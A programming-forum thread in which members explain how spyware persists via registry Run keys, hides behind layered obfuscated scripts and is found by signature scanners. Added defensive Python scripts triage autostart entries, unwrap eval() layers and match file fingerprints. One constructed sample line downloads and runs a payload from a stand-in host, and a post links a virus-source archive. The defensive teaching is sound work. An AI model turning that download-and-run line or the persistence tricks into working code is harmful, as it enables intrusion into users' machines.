What would a spyware program look like in code?

darkmandaddy

Member
Dec 25, 2008
155
0
0
Are spyware programs the product of Visual Basic, or programming? How would the code to scan the computer for a file, to keep it simple, look?
 

Ken g6

Programming Moderator, Elite Member
Moderator
Dec 11, 1999
16,574
4,487
75
Visual Basic is a programming language (despite vicious rumors to the contrary ;)). I wouldn't expect much spyware to be written in VB (partly due to said vicious rumors. :p), but I could be wrong.

Code to scan a computer for a file can be in practically any programming language. You might find GNU findutils, which are written in C, interesting; though C is a much lower-level (somewhat less human-friendly) language than VB.
 

Journer

Banned
Jun 30, 2005
4,355
0
0
Sorry to thread hi-jack, but I have a lot of interest in this too. I know it might be a bit taboo, but for the sake of understanding, I think it is important. Where can one find the source code to a virus or spyware program, and how can one see how it works inside a quarantined environment? The best way to defend is to understand, right?
 

Snapster

Diamond Member
Oct 14, 2001
3,916
0
0
Given some of the UIs on spyware I would not be surprised if they were written in VB, lol, but seriously they are usually written in C/C++ as they have to be native to the OS in order to run on as many potential targets as possible.

In order to be successful over time, viruses and spyware have to modify your system so they will always run when you start your PC. They are usually an exe which hooks into your system by modifying the registry to always run when the PC starts; sometimes they come in what is called a binary pair, where there are two exes which protect each other by starting the other if one detects that its sibling is not running, making it very frustrating to get rid of.

The main goal of spyware is obviously either to collect data and send it somewhere, or to redirect you to a different location, so they usually have to use network calls and change registry or file settings rather than scan a load of files like a normal virus would (although some spyware does). Scanning every file on the PC is very simple and can be done with a very simple recursive loop; obviously you would have to choose to do something with each file, but the code is very small, i.e.:

// Managed C++ ("Managed Extensions for C++", the pre-C++/CLI syntax this
// snippet is written in). Needs the two .NET assemblies referenced below.
#using <mscorlib.dll>
#using <System.Windows.Forms.dll>
using namespace System;
using namespace System::IO;
using namespace System::Windows::Forms;

void DirSearch(String* sDir)
{
    try
    {
        // Find all the files in the folder that is passed in.
        String* f[] = Directory::GetFiles(sDir);
        int numFiles = f->get_Length();
        for (int j = 0; j < numFiles; j++)
        {
            // do something with file f[j]
        }

        // Find the subfolders in the folder that is passed in,
        // then recurse into each one.
        String* d[] = Directory::GetDirectories(sDir);
        int numDirs = d->get_Length();
        for (int i = 0; i < numDirs; i++)
        {
            DirSearch(d[i]);
        }
    }
    catch (System::Exception* e)
    {
        // An unreadable folder (permissions, reparse points) lands here;
        // one box per failure, and the caller's loop carries on with the
        // next folder.
        MessageBox::Show(e->Message);
    }
}

darn fusetalk code attach.... does anyone have that link for pasting code with pretty formatting?
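The registry hook Snapster describes is the first thing to look at when triaging a machine. The script below is an added example (mine, not code from the thread): it parses the text that `reg export` or regedit produce for the Run and RunOnce keys and flags entries whose executable sits in a user-writable directory. The registry export, the program names and the paths in it are constructed for the demo.

```python
"""Triage Windows autostart (Run key) entries from a .reg export.

Added example for this thread, not code from it. Works on the text that
`reg export` or regedit produce, so it runs anywhere, including on a
forensic copy of the hives. The sample below is constructed; every
program name and path in it is made up.
"""
import re
from typing import Dict, List

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ExampleAV"="C:\\Program Files\\Example AV\\tray.exe"
"updater"="\"C:\\Users\\Public\\svchost.exe\" -silent"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SyncClient"="\"C:\\Users\\alice\\AppData\\Local\\SyncClient\\sync.exe\" /background"
"helper"="C:\\Users\\alice\\AppData\\Local\\Temp\\helper.exe"
"helper2"="C:\\Users\\alice\\AppData\\Local\\Temp\\helper2.exe"
'''

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)
# "name"="value" with .reg escaping (\\ and \") allowed inside either string.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Heuristic, not a verdict: locations any user can write to, minus the
# system directories that legitimate autostart entries normally live in.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")
TRUSTED = ("\\program files", "\\windows\\")


def unescape_reg(s: str) -> str:
    """Undo .reg escaping (backslash-backslash and backslash-quote)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(reg_text: str) -> List[Dict[str, str]]:
    """Collect name/command pairs from every Run and RunOnce key."""
    entries: List[Dict[str, str]] = []
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            current_key = key if RUN_KEY_RE.search(key) else None
            continue
        if current_key is None:
            continue
        m = VALUE_RE.match(line)
        if m:
            entries.append({"key": current_key,
                            "name": unescape_reg(m.group(1)),
                            "command": unescape_reg(m.group(2))})
    return entries


def executable_path(command: str) -> str:
    """Pull the program path out of a Run command line.

    Quoted paths end at the closing quote; unquoted ones are cut after
    the first '.exe'. Good enough for triage, not a CreateProcess parser.
    """
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.*?\.exe)", command, re.IGNORECASE)
    return m.group(1) if m else command.split(" ", 1)[0]


def flag_suspicious(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep the entries whose executable lives in a user-writable place."""
    flagged = []
    for e in entries:
        exe = executable_path(e["command"])
        low = exe.lower()
        if any(t in low for t in TRUSTED):
            continue
        if any(u in low for u in USER_WRITABLE):
            flagged.append({**e, "exe": exe,
                            "reason": "autostart from user-writable directory"})
    return flagged


if __name__ == "__main__":
    for hit in flag_suspicious(parse_run_entries(SAMPLE_REG)):
        print(hit["key"].split("\\")[0], hit["name"], "->", hit["exe"])
```

SyncClient shows the limit of a path heuristic: a legitimately user-installed program runs from AppData and gets flagged alongside the two Temp entries, so the output is a triage list and the next step is checking the signer and hash of each flagged binary. The helper.exe/helper2.exe pair sitting in one Temp directory is what the watchdog pair Snapster describes looks like from the registry side.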
 

darkmandaddy

Member
Dec 25, 2008
155
0
0
If it's written in C/C++, how do you create a GUI for it? What does GNU stand for? (I'm sorry, stupid question.) I understand the code above; that seems kinda cool. Thx
 

Cogman

Lifer
Sep 19, 2000
10,284
138
106
Originally posted by: darkmandaddy
If it's written in C/C++, how do you create a GUI for it? What does GNU stand for? (I'm sorry, stupid question.) I understand the code above; that seems kinda cool. Thx

Making a GUI, while a pain, isn't impossible. It's just a few calls to the windows.h library. The functions are all along the lines of "CreateWindow" etc. (for a Windows OS; different OSes are easier/harder to make C++ GUIs for.)

GNU stands for "GNU's Not Unix". It basically translates into open source software for most people (yes, there are other open source licenses; however, GNU's GPL is the most popular by far).

 

darkmandaddy

Member
Dec 25, 2008
155
0
0
oooh, I thought I heard of that term but I forgot where. Thank you.
Also, would creating a GUI with C++ be similar to HTML?
 

Crusty

Lifer
Sep 30, 2001
12,684
2
81
Originally posted by: darkmandaddy
oooh, I thought I heard of that term but I forgot where. Thank you.
Also, would creating a GUI with C++ be similar to HTML?

Not in one bit.
 

Markbnj

Elite Member, Moderator Emeritus
Moderator
Sep 16, 2005
15,682
14
81
www.markbetz.net
If you've ever looked at spyware in detail then you know that it is typically multi-layered. The top layer is often self-constructing VBScript or JavaScript. In other words, when you look at the code you see this convoluted mess that is difficult to follow. When you do follow it you discover that all it does is create the real code that then runs. Often there are several layers of this just to keep it hard to detect. Following that there is often a binary payload downloaded from a remote site, and things can go in a number of directions from there.

Also, a word of warning that detailed discussions of spyware design on this forum will at least trigger a close mod review of the posts and TOS. :)
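The layered, self-constructing scripts Markbnj describes can be peeled statically when each layer is just a decoder wrapped in eval(). The Python below is an added example, not code from the thread or from any real sample: it builds a constructed three-layer sample (unescape, String.fromCharCode and atob wrapped around an inner script that points at a reserved example.invalid URL) and then unwraps it one layer at a time. The encoder helpers exist only to generate the test input.

```python
"""Peel layered eval() wrappers off a script, one layer at a time.

Added example for this thread, not code from it or from any real
sample. Handles the three decoders most often seen wrapped in eval():
unescape("%..."), String.fromCharCode(...) and atob("...").
"""
import base64
import re
import urllib.parse
from typing import List, Optional, Tuple

# Constructed inner script; example.invalid is a reserved name, not a host.
INNER = 'var u = "http://example.invalid/payload.exe"; fetchAndRun(u);'


# --- encoders: used only to build the test sample ------------------------
def wrap_unescape(code: str) -> str:
    return 'eval(unescape("%s"))' % "".join("%%%02X" % b for b in code.encode())


def wrap_fromcharcode(code: str) -> str:
    return "eval(String.fromCharCode(%s))" % ",".join(str(ord(c)) for c in code)


def wrap_atob(code: str) -> str:
    return 'eval(atob("%s"))' % base64.b64encode(code.encode()).decode()


# Three layers: each one only produces the next, as the post describes.
SAMPLE = wrap_unescape(wrap_fromcharcode(wrap_atob(INNER)))


# --- decoders ------------------------------------------------------------
UNESCAPE_RE = re.compile(r'^\s*eval\(unescape\("([^"]*)"\)\)\s*;?\s*$')
CHARCODE_RE = re.compile(r"^\s*eval\(String\.fromCharCode\(([\d,\s]*)\)\)\s*;?\s*$")
ATOB_RE = re.compile(r'^\s*eval\(atob\("([A-Za-z0-9+/=]*)"\)\)\s*;?\s*$')


def peel_once(code: str) -> Optional[Tuple[str, str]]:
    """Return (decoder name, decoded layer), or None if code is not a wrapper."""
    m = UNESCAPE_RE.match(code)
    if m:
        # JS unescape() is per-character; unquote() is equivalent for ASCII.
        return "unescape", urllib.parse.unquote(m.group(1))
    m = CHARCODE_RE.match(code)
    if m:
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        return "fromCharCode", "".join(chr(n) for n in codes)
    m = ATOB_RE.match(code)
    if m:
        return "atob", base64.b64decode(m.group(1)).decode("utf-8", "replace")
    return None


def peel(code: str, max_layers: int = 16) -> List[Tuple[str, str]]:
    """Unwrap until the script no longer starts with a known decoder.

    max_layers guards against a sample that decodes to itself forever.
    """
    layers: List[Tuple[str, str]] = []
    for _ in range(max_layers):
        step = peel_once(code)
        if step is None:
            break
        layers.append(step)
        code = step[1]
    return layers


def extract_urls(code: str) -> List[str]:
    """Pull http(s) URLs out of the innermost layer: the download stage."""
    return re.findall(r"https?://[^\s\"']+", code)


if __name__ == "__main__":
    for depth, (kind, layer) in enumerate(peel(SAMPLE), 1):
        print("layer %d via %s: %s" % (depth, kind, layer[:60]))
```

Real top layers are rarely this tidy: strings get split and concatenated, junk code and document.write calls are mixed in, and the decoder may be a custom function. When the regexes stop matching, the robust approach is to run the script in an isolated interpreter with eval (and document.write) replaced by a function that logs its argument instead of executing it, which yields the next layer regardless of how it was built.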
 

darkmandaddy

Member
Dec 25, 2008
155
0
0
Well, thanks. I was looking at free spyware detection programs, and after I took some classes in C++ and VB, I thought that the cyberworld is all composed of code like that. I didn't mean to create spyware, but just how does one of those programs work to find the right thing to delete?
 

Cogman

Lifer
Sep 19, 2000
10,284
138
106
Originally posted by: darkmandaddy
Well, thanks. I was looking at free spyware detection programs, and after I took some classes in C++ and VB, I thought that the cyberworld is all composed of code like that. I didn't mean to create spyware, but just how does one of those programs work to find the right thing to delete?

Well then, generally you don't have to know a whole lot about HOW spyware/malware works in order to filter for it. Filtering is generally done with heuristics rather than even caring about how the author made the spyware. This works pretty well for the most part, as spyware/malware code is generally pretty static.

Think of it this way: every program has a fingerprint of some sort, and antivirus/antispyware has a database of fingerprints, so to speak, that it uses to go through all programs on your computer and check. If something has a fingerprint that matches, it throws up a warning so you might delete it.

Mark: I figured we were starting to head towards dangerous waters. The only thing is, once you know how to program, viruses really aren't THAT hard to write. I also figured that making a GUI really wasn't so much a part of writing malware as it is general programming practice.
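Cogman's fingerprint database, combined with the recursive directory walk from Snapster's post, as an added example in Python (mine, not any product's engine): it walks a tree, hashes every file and checks two kinds of fingerprint, an exact SHA-256 database and a set of byte patterns, which is the difference between catching an identical copy and catching a lightly modified variant. The "known bad" body, the hashes and the detection names are constructed for the demo.

```python
"""Recursive file scan against a fingerprint database.

Added example for this thread (not any product's engine). Walks a tree,
hashes every file and checks two kinds of fingerprint: exact SHA-256
matches and byte patterns. The "known bad" body, hashes and detection
names are constructed for the demo.
"""
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List, Tuple

KNOWN_BAD_BODY = b"MZ\x90\x00CONSTRUCTED-SAMPLE: phones home to example.invalid\n"
# A real product ships the hashes, not the samples they were taken from.
HASH_DB = {hashlib.sha256(KNOWN_BAD_BODY).hexdigest(): "Example.Spyware.A"}

# Byte patterns survive edits that change the hash (repacking, a tweaked
# header); list order only affects the order of the names reported.
SIGNATURE_DB = [
    (b"phones home to example.invalid", "Example.Spyware.A (variant)"),
    (b"\\CurrentVersion\\Run", "Generic.Autostart"),
]


def fingerprint_file(path: str, chunk: int = 1 << 16) -> Tuple[str, List[str]]:
    """Stream one file: return its SHA-256 and the signature names that hit."""
    h = hashlib.sha256()
    hits: List[str] = []
    longest = max(len(p) for p, _ in SIGNATURE_DB)
    tail = b""  # carry-over so a pattern split across two chunks still matches
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                break
            h.update(buf)
            window = tail + buf
            for pattern, name in SIGNATURE_DB:
                if name not in hits and pattern in window:
                    hits.append(name)
            tail = window[-(longest - 1):] if longest > 1 else b""
    return h.hexdigest(), hits


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Visit every regular file under root and report what matched."""
    findings: List[Dict[str, object]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if os.path.islink(path):  # do not follow links out of the tree
                continue
            try:
                digest, sig_hits = fingerprint_file(path)
            except OSError as err:  # unreadable file: record it, keep going
                findings.append({"path": path, "error": str(err)})
                continue
            verdicts = []
            if digest in HASH_DB:
                verdicts.append("hash:" + HASH_DB[digest])
            verdicts += ["sig:" + s for s in sig_hits]
            if verdicts:
                findings.append({"path": path, "verdicts": verdicts})
    return findings


def build_demo_tree() -> str:
    """Create a throwaway directory with one clean file and three that match."""
    root = tempfile.mkdtemp(prefix="scan-demo-")
    os.makedirs(os.path.join(root, "a", "b"))
    files = {
        os.path.join(root, "clean.txt"): b"nothing to see here\n",
        os.path.join(root, "a", "exact.bin"): KNOWN_BAD_BODY,
        # same body with one header byte changed: hash differs, pattern stays
        os.path.join(root, "a", "b", "variant.bin"): KNOWN_BAD_BODY.replace(b"\x90", b"\x91"),
        os.path.join(root, "a", "b", "installer.txt"):
            b"writes HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",
    }
    for p, body in files.items():
        with open(p, "wb") as f:
            f.write(body)
    return root


def scan_demo() -> Dict[str, List[str]]:
    """Build the demo tree, scan it, clean up; results keyed by file name."""
    root = build_demo_tree()
    try:
        return {os.path.basename(str(f["path"])): list(f.get("verdicts", []))
                for f in scan_tree(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for name, verdicts in sorted(scan_demo().items()):
        print(name, verdicts)
```

The hash only matches the byte-identical exact.bin; variant.bin, with one header byte changed, is caught by the byte pattern alone. That is why signature databases carry patterns and not just hashes, and why real engines layer the heuristics Cogman mentions, unpackers and emulation on top of this.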
 

degibson

Golden Member
Mar 21, 2008
1,389
0
0
There's no good reason that spyware code couldn't be pretty or even elegant. After all, the infected party very rarely sees the source anyway. Of course, the actual architecture of the spyware is going to be purposely misleading.

Speaking of virii source, I came across this the other day: http://www.totallygeek.com/vscdb/ . Use your power for good, not evil.
 

Markbnj

Elite Member, Moderator Emeritus
Moderator
Sep 16, 2005
15,682
14
81
www.markbetz.net
Mark: I figured we were starting to head towards dangerous waters. The only thing is, once you know how to program, viruses really aren't THAT hard to write. I also figured that making a GUI really wasn't so much a part of writing malware as it is general programming practice.

I wouldn't say we're there yet, but I wanted to drop it out there so that people would be cognizant of the line that should not be crossed. :)
 

degibson

Golden Member
Mar 21, 2008
1,389
0
0
Originally posted by: darkmandaddy
Wow, that site is awesome. Does anyone know what the other extensions mean? Other than c, cpp, doc?

Personally, I found it interesting but not all that insightful. The real trick of writing a successful virus is knowing what to exploit. Malware is a lot easier. Not that I have any experience, mind you, aside from a couple of harmless fork bombs I played on my friend in college.
 

Crusty

Lifer
Sep 30, 2001
12,684
2
81
Originally posted by: Markbnj
Originally posted by: MrChad
There's a good article posted on /. today that reminded me of this thread.

An interesting read: http://philosecurity.org/2009/...-with-an-adware-author

Yeah, I read that earlier. Interesting, however they were really trying to avoid writing malware, if you believe the guy. Used many of the same techniques though.

I wonder how many of those techniques still work in Vista/Windows 7.... I would think running IE7 in protected mode coupled with UAC would prevent most of those techniques from working.
 

degibson

Golden Member
Mar 21, 2008
1,389
0
0
Originally posted by: Crusty
Originally posted by: Markbnj
Originally posted by: MrChad
There's a good article posted on /. today that reminded me of this thread.

An interesting read: http://philosecurity.org/2009/...-with-an-adware-author

Yeah, I read that earlier. Interesting, however they were really trying to avoid writing malware, if you believe the guy. Used many of the same techniques though.

Interesting read.

I wonder how many of those techniques still work in Vista/Windows 7.... I would think running IE7 in protected mode coupled with UAC would prevent most of those techniques from working.

For my part, I think as long as one OS and one browser are as popular as XP/Vista/7 and IE6/7/+, there will be a lot of known exploits. The only way to get rid of that kind of exploit is a massive diversification of (at least) browser and hopefully OS.

 

chronodekar

Senior member
Nov 2, 2008
721
1
0
Originally posted by: degibson
For my part, I think as long as one OS and one browser are as popular as XP/Vista/7 and IE6/7/+, there will be a lot of known exploits. The only way to get rid of that kind of exploit is a massive diversification of (at least) browser and hopefully OS.

This is going to sound idealistic, but the general requirement is to have some OS/browser combination that everyone can use AND that is adware-secure.

While I like diversification, if you take a look at the Linux community, getting a straight answer for your specific need is going to be very difficult, unless you know your way around things :roll:

Just imagining the general public's confusion at having more than 4 popular OSes running around is making me shiver!!

So, while I agree with you that having a diversified field WILL reduce this kind of exploit, I don't think it's a solution that can be implemented.
 

Markbnj

Elite Member, Moderator Emeritus
Moderator
Sep 16, 2005
15,682
14
81
www.markbetz.net
Diversification cuts both ways. You can choose a small pond and be a big fish in it, but when it dries up you're farked. If we had real OS diversification, a thriving market in versions and flavors, they'd all have to support something like .NET as a standard. It's hard to imagine ten or fifteen good, stable office productivity packages across ten or fifteen OS flavors of the month. MS Office has what.. twenty years now? Some of it's great, some of it sucks, but everyone can use it.
 

degibson

Golden Member
Mar 21, 2008
1,389
0
0
Originally posted by: Markbnj
Diversification cuts both ways. You can choose a small pond and be a big fish in it, but when it dries up you're farked. If we had real OS diversification, a thriving market in versions and flavors, they'd all have to support something like .NET as a standard. It's hard to imagine ten or fifteen good, stable office productivity packages across ten or fifteen OS flavors of the month. MS Office has what.. twenty years now? Some of it's great, some of it sucks, but everyone can use it.

Diversification would also cut down on the motivation to make ad-ware in the first place, there wouldn't be a single logical target. That is, diversification would nerf ad-ware's usefulness in the first place, but it would also magnify legitimate development costs.

I suppose I'm somewhat of a pessimist, but I think we're always going to have buggy exploitable code, and exploits that exploit the exploits.
 

Crusty

Lifer
Sep 30, 2001
12,684
2
81
Originally posted by: degibson
Originally posted by: Markbnj
Diversification cuts both ways. You can choose a small pond and be a big fish in it, but when it dries up you're farked. If we had real OS diversification, a thriving market in versions and flavors, they'd all have to support something like .NET as a standard. It's hard to imagine ten or fifteen good, stable office productivity packages across ten or fifteen OS flavors of the month. MS Office has what.. twenty years now? Some of it's great, some of it sucks, but everyone can use it.

Diversification would also cut down on the motivation to make ad-ware in the first place, there wouldn't be a single logical target. That is, diversification would nerf ad-ware's usefulness in the first place, but it would also magnify legitimate development costs.

I suppose I'm somewhat of a pessimist, but I think we're always going to have buggy exploitable code, and exploits that exploit the exploits.

Like Markbnj said, if there were to be mass diversification of operating systems there would have to be some sort of common framework, otherwise it's just not feasible. With that common framework comes the single point of attack.

 

presidentender

Golden Member
Jan 23, 2008
1,166
0
76
I'd like to see diversification of browsers, not necessarily of operating systems. We're already on the way with Firefox, Opera, and Safari gaining ground on IE (okay, mostly just Firefox) and Chrome making waves periodically. I look forward to a period of really cool browser development as IE tries to keep market share and the others try to gain traction. Maybe in the end they'll all be secure ;)